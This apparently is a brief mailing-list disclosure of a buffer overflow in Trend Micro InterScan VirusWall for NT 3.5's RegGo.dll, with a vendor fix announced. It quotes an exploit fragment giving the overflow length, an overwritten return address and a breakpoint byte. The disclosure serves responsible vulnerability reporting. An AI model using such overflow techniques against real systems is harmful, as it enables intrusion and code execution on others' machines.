TrendMicro Interscan VirusWall RegGo.dll BOf

[Nobuo Miwa <n-miwa () lac co jp>]

Hi,

This is a Buffer Overflow vulneravility in Trend Micro
InterScan VirusWall for NT 3.5.
RegGo.dll is the one.

Following code is a peace of exploit program.

    for ( j=0 ; j<820 ; j++ )
        sploit[j]='a' ;
    sploit[j++]=0xD5 ;
    sploit[j++]=0x63 ;
    sploit[j++]=0xF6 ;
    sploit[j++]=0x77 ;
    sploit[j++]=0xCC ; --> any code will be executed

I've already reported Trend Micro support team and they
will fix this issue in InterScan version 3.51 Build 1349.


<Nobuo Miwa> n-miwa () lac co jp       ( @ @ ) http://www.lac.co.jp/security/
-------------------------------o00o--(. .)--o00o--------------------------
The moderator of BUGTRAQ-JP